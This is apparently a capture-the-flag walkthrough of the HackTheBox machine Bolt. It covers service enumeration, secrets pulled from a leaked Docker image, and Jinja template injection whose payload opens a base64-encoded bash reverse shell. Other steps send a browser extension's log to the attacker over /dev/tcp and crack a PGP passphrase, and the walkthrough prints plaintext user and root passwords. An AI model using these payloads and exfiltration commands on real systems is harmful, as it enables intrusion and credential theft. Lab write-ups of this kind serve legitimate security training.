1. IP Address

# Machine Address
10.10.11.114

# Local Address
10.10.14.50

2. Nmap

# Nmap 7.91 scan initiated Thu Nov  4 00:16:52 2021 as: nmap -sC -sV -oA nmap/bolt 10.10.11.114
Nmap scan report for 10.10.11.114
Host is up (0.51s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)
|   256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)
|_  256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title:     Starter Website -  About 
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-title: Passbolt | Open source password manager for teams
|_Requested resource was /auth/login?redirect=%2F
| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2021-02-24T19:11:23
|_Not valid after:  2022-02-24T19:11:23
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov  4 00:17:28 2021 -- 1 IP address (1 host up) scanned in 36.27 seconds

3. Gobuster

gobuster dir -u http://10.10.11.114 -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -o gobuster.out
/login                (Status: 200) [Size: 9287]
/index                (Status: 308) [Size: 247] [--> http://10.10.11.114/]
/register             (Status: 200) [Size: 11038]                         
/contact              (Status: 200) [Size: 26293]                         
/download             (Status: 200) [Size: 18570]                         
/profile              (Status: 500) [Size: 290]                           
/logout               (Status: 302) [Size: 209] [--> http://10.10.11.114/]
/services             (Status: 200) [Size: 22443]                         
/pricing              (Status: 200) [Size: 31731]                         
/sign-in              (Status: 200) [Size: 9287]                          
/sign-up              (Status: 200) [Size: 11038]     

Nothing useful found here.

Gobuster with VHOST

gobuster vhost -u http://10.10.11.114 -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -o gobuster_vhost.out

Vhost mode found nothing. Caveat: with the target given as an IP, gobuster sends Host: <word>.10.10.11.114, which no name-based vhost will ever match; rerun it with -u http://bolt.htb (the domain on the TLS certificate) to catch names such as demo.bolt.htb and mail.bolt.htb used later:

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://10.10.11.114
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2021/11/13 08:14:13 Starting gobuster in VHOST enumeration mode
===============================================================
                                   
===============================================================
2021/11/13 09:04:24 Finished
===============================================================

4. ffuf

ffuf -u http://10.10.11.114/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -o fuff.out -of json

Output:

________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.114/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
 :: Output file      : fuff.out
 :: File format      : json
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

login                   [Status: 200, Size: 9287, Words: 2135, Lines: 173]
register                [Status: 200, Size: 11038, Words: 3053, Lines: 199]
contact                 [Status: 200, Size: 26293, Words: 10060, Lines: 468]
download                [Status: 200, Size: 18570, Words: 5374, Lines: 346]
logout                  [Status: 302, Size: 209, Words: 22, Lines: 4]
services                [Status: 200, Size: 22443, Words: 7170, Lines: 405]
pricing                 [Status: 200, Size: 31731, Words: 11055, Lines: 549]
sign-in                 [Status: 200, Size: 9287, Words: 2135, Lines: 173]
sign-up                 [Status: 200, Size: 11038, Words: 3053, Lines: 199]
check-email             [Status: 200, Size: 7331, Words: 1224, Lines: 147]
:: Progress: [43003/43003] :: Job [1/1] :: 162 req/sec :: Duration: [0:04:31] :: Errors: 0 ::

There is a check-email endpoint. Opening it: http://10.10.11.114/check-email

Burp:

POST /register HTTP/1.1
Host: 10.10.11.114
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
Origin: http://10.10.11.114
DNT: 1
Connection: close
Referer: http://10.10.11.114/register
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=ca4mi&email=ca4mi%40mail.com&password=ca4mi

Passbolt login page on 443 (/auth/login):

GET /auth/login?redirect=%2F HTTP/2
Host: 10.10.11.114
Cookie: passbolt_session=32q4d8uhp91s8j1nq7p79qprp7; csrfToken=55812a799be2316e0d4af2e41bc4793889c05b6e178787be229a78a9320d5bb317d53e6d70ce9ddca41ee337b5650ce8d36926445447873d30dc06d62adcecb7
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Cache-Control: max-age=0
Te: trailers
Connection: close

5. Image tar

tar -xvf image.tar
tar: This does not look like a tar archive
tar: Exiting with failure status due to previous errors

It errored out, so I downloaded it again. That worked.

Find the SQL password hash inside this and crack it. Since cracking would take time, I used the already-known password: admin:deadbolt

Eddie demo.bolt.htb/register mail.bolt.htb

Invite code (in app/base/routes.py inside the extracted layer):

41093412e0da959c80875bb0db640c1302d5bcdffec759a3a5670950272789ad/app/base/routes.py

invite_code XNSS-HSJW-3NGU-8XTJ
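The image handling above (extracting the tar, digging the SQL hash and the invite code out of a layer) can be scripted. This is an added example, not code from the original notes: it verifies the file is really a tar before extracting (a truncated download gives exactly the "does not look like a tar archive" error), unpacks nested layer tars into their layer directory, refuses path-traversal members, and greps the result for hash and credential patterns. The sample image, layer id, hash value and invite code are constructed placeholders, not the real ones from the box.

```python
import io
import os
import re
import tarfile
import tempfile
from pathlib import Path

# Constructed list of things worth flagging in a leaked image (my choice, not from the notes).
PATTERNS = {
    "crypt-style hash": re.compile(rb"\$(?:2[aby]|P|H|1|5|6)\$[./A-Za-z0-9$]{8,}"),
    "werkzeug pbkdf2 hash": re.compile(rb"pbkdf2:sha\d+(?::\d+)?\$[A-Za-z0-9]+\$[0-9a-f]+"),
    "invite/api code": re.compile(rb"""(?i)\b(?:invite_code|api_key|secret_key)\s*=\s*['"]([^'"]+)['"]"""),
    "pgp private key": re.compile(rb"-----BEGIN PGP PRIVATE KEY BLOCK-----"),
}
MAX_SCAN_BYTES = 8 * 1024 * 1024
# Pythons that know extraction filters get the strict "data" filter; older ones fall back to our own checks.
_FILTER_KW = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}


def looks_like_tar(path):
    """Same check tar itself does before saying 'This does not look like a tar archive'.
    A truncated or HTML-wrapped download fails here: re-download and compare checksums."""
    try:
        return tarfile.is_tarfile(os.fspath(path))
    except (OSError, tarfile.TarError):
        return False


def safe_extract(tar_path, dest):
    """Extract regular files and directories only, refusing any member whose
    resolved path would land outside dest (classic tar path traversal)."""
    dest = Path(dest).resolve()
    with tarfile.open(os.fspath(tar_path)) as tar:
        for member in tar.getmembers():
            target = (dest / member.name).resolve()
            if target != dest and dest not in target.parents:
                raise ValueError(f"refusing path traversal: {member.name}")
            if not (member.isfile() or member.isdir()):
                continue  # symlinks/devices from an untrusted layer are never worth extracting
            tar.extract(member, path=dest, **_FILTER_KW)


def extract_image(image_tar, workdir):
    """Unpack the image, then every nested layer tar into its own directory, so files
    end up at <layer-dir>/<path-inside-layer>, the form referenced in the notes."""
    workdir = Path(workdir)
    safe_extract(image_tar, workdir)
    for layer in sorted(workdir.rglob("*.tar")):
        if looks_like_tar(layer):
            safe_extract(layer, layer.parent)
            layer.unlink()  # don't scan the archive bytes a second time
    return workdir


def find_secrets(root):
    """Return [(label, relative path, matched value)] for every pattern hit under root."""
    root = Path(root)
    hits = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        if path.stat().st_size > MAX_SCAN_BYTES:
            continue
        data = path.read_bytes()
        for label, rx in PATTERNS.items():
            for m in rx.finditer(data):
                value = m.group(m.lastindex or 0)
                hits.append((label, str(path.relative_to(root)), value.decode("latin-1")))
    return hits


def _tar_bytes(files):
    """Build a tar archive in memory from {member name: bytes}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_sample_image(path):
    """Constructed stand-in for the downloaded image.tar: one layer holding a Flask
    app with a hard-coded invite code and a dumped users table. Returns the layer id."""
    layer = _tar_bytes({
        "app/base/routes.py": b'import flask\ninvite_code = "AAAA-BBBB-CCCC-DDDD"  # placeholder\n',
        "db/users.sql": b"INSERT INTO user VALUES (1,'admin','pbkdf2:sha256:150000$abc123$0123456789abcdef');\n",
    })
    digest = "e3b0c442" * 8  # placeholder layer id, not a real digest
    Path(path).write_bytes(_tar_bytes({"manifest.json": b"[]", f"{digest}/layer.tar": layer}))
    return digest


def demo():
    """Run the whole pipeline on the constructed image; returns (layer id, hits)."""
    with tempfile.TemporaryDirectory() as tmp:
        image = Path(tmp) / "image.tar"
        digest = build_sample_image(image)
        if not looks_like_tar(image):
            raise SystemExit("not a tar archive; re-download and compare checksums")
        root = extract_image(image, Path(tmp) / "extracted")
        return digest, find_secrets(root)


if __name__ == "__main__":
    for label, path, value in demo()[1]:
        print(f"{label:22} {path}: {value}")
```

On a real image, swap build_sample_image for the downloaded file; the werkzeug pattern is there because a Flask app stores its user table that way, and a hit on it is what goes into hashcat/john next.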

SSTI

Log in through demo (demo.bolt.htb) and create a user. Then, under Settings, change that user's name to:

{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zNi85MDAxIDA+JjEK | base64 -d | bash")["read"]() %} a {% endwith %}

Save that change, start an nc listener (the base64 in the payload decodes to bash -i >& /dev/tcp/10.10.14.36/9001 0>&1, so the listener must sit on that address and port, or the string must be re-encoded for yours), log in at mail.bolt.htb, open the confirmation mail, and the shell calls back.

/etc/passbolt/passbolt.php
/var/mail/eddie
eddie@bolt:~$ cat /var/mail/eddie  
From clark@bolt.htb  Thu Feb 25 14:20:19 2021  
Return-Path: <clark@bolt.htb>  
X-Original-To: eddie@bolt.htb  
Delivered-To: eddie@bolt.htb  
Received: by bolt.htb (Postfix, from userid 1001)  
id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)  
Subject: Important!  
To: <eddie@bolt.htb>  
X-Mailer: mail (GNU Mailutils 3.7)  
Message-Id: <20210225212019.DFF264CD@bolt.htb>  
Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)  
From: Clark Griswold <clark@bolt.htb>  
  
Hey Eddie,  
  
The password management server is up and running.  Go ahead and download the extension to your browser and get logged in.  Be sure to back up your private key because I CANNOT recover it.  Your private key is the only way to recover your account.  
Once you're set up you can start importing your passwords.  Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...  
  
-Clark

eddie’s password: rT2;jW7<eY8!dX8}pQ8%

user.txt

528abe*******

SSH in as eddie:

grep -iR "BEGIN PGP"
grep -iR "PRIVATE KEY"

john is required

/etc/hosts: add passbolt.bolt.htb

Files found:
  • /home/eddie/.gnupg/openpgp-revocs.d/eddie.key
  • /home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log

Copy the 000003.log file to the local machine. Local:

nc -lvnp 9001 > 000003.log

Machine (the path contains spaces, so it must be quoted):

cat "/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log" > /dev/tcp/10.10.14.50/9001

Open the copied log in vim and run this substitution to turn the literal \r\n sequences into real line breaks: :%s/\\r\\n/\r/g
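The same clean-up as a script, so the key can be pulled straight out of the raw LevelDB log without hand-editing. This is an added example, not part of the original notes: it finds every armored private key block in the file, converts the escaped line breaks (double-escaped first, then single) into real newlines, and writes the first one out ready for gpg2john. The SAMPLE_LOG bytes are constructed; the key body in them is filler, not a real key, and the extension id is the one from the path above.

```python
import re
from pathlib import Path

BEGIN = "-----BEGIN PGP PRIVATE KEY BLOCK-----"
END = "-----END PGP PRIVATE KEY BLOCK-----"
_ARMOR_RE = re.compile(re.escape(BEGIN) + r".*?" + re.escape(END), re.S)

# Constructed stand-in for the extension's LevelDB .log: binary framing around a
# JSON value whose line breaks are stored as the two characters '\' 'r' '\' 'n'.
SAMPLE_LOG = (
    b"\x00\x01\x02didegimhafipceonhjepacocaffmoppf\x00"
    b'{"passbolt-private-gpgkey":{"armored_key":"'
    b"-----BEGIN PGP PRIVATE KEY BLOCK-----\\r\\n\\r\\n"
    b"lQdGBFAKEKEYLINE1\\r\\nAAAAFAKEKEYLINE2\\r\\n=AbCd\\r\\n"
    b"-----END PGP PRIVATE KEY BLOCK-----\\r\\n"
    b'","key_id":"0000000000000000"}}\x00\xff'
)


def unescape_armor(text):
    """Replace escaped line breaks with real newlines (double-escaped \\\\r\\\\n first,
    then \\r\\n, then bare \\n) and drop stray carriage returns: the vim step, in code."""
    for esc in ("\\\\r\\\\n", "\\r\\n", "\\n"):
        text = text.replace(esc, "\n")
    return text.replace("\r", "")


def extract_private_keys(raw):
    """Every armored private key block in raw bytes, newline-normalised, each ending in '\\n'."""
    text = raw.decode("latin-1")  # one byte -> one char, so binary noise cannot break decoding
    return [unescape_armor(m.group(0)) + "\n" for m in _ARMOR_RE.finditer(text)]


def save_first_key(raw, out_path):
    """Write the first recovered key to out_path (input for gpg2john); return its line count."""
    keys = extract_private_keys(raw)
    if not keys:
        raise ValueError("no armored private key found")
    Path(out_path).write_text(keys[0])
    return keys[0].count("\n")


if __name__ == "__main__":
    import sys
    import tempfile
    raw = Path(sys.argv[1]).read_bytes() if len(sys.argv) > 1 else SAMPLE_LOG
    out = sys.argv[2] if len(sys.argv) > 2 else str(Path(tempfile.gettempdir()) / "private_key.txt")
    print(f"wrote {save_first_key(raw, out)} lines to {out}")
```

Run it as python3 extract_key.py 000003.log private_key.txt; if gpg --show-keys private_key.txt does not list a secret key, the escaping in the log differed from the three forms handled here and the block needs inspecting by hand.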

Crack the key passphrase with rockyou. john needs the gpg2john hash form, not the armored key itself:

gpg2john private_key.txt > private_key.hash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=gpg private_key.hash

From eddie:

su root

Password:

(2rmxsNW(Z?3=p/9s